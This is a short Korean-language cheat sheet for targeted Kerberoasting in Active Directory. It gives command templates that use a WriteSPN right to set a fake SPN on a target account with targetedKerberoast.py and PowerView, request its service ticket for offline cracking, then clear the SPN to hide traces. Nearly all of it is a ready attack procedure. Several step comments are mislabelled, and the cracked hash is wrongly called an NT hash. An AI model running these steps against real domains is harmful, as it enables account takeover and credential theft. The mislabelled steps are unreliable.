WriteSPN 권한이 있는 개체는 공격자가 SPN을 등록할 수 있습니다.
이러한 방식을 사용해서 NT Hash 크래킹을 시도할 수 있습니다.
# 명령어 양식
python3 targetedKerberoast.py -v -d <Domain> -u <USER> -p <PASS> --request-user <Target> --only-abuse
# 권한이 있는 사용자 개체 정보 변수화
$SecPassword = ConvertTo-SecureString <PASS> -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential(<Domain>/<USER>, $SecPassword)
# 도메인 객체 정보 저장
Set-DomainObject -Credential $Cred -Identity <Target> -SET @{serviceprincipalname='nonexistent/HTTP'}
# SPN 등록
Get-DomainSPNTicket -Credential $Cred <Target> | fl
# 공격 후 SPN 정리
Set-DomainObject -Credential $Cred -Identity <Target> -Clear <SPN>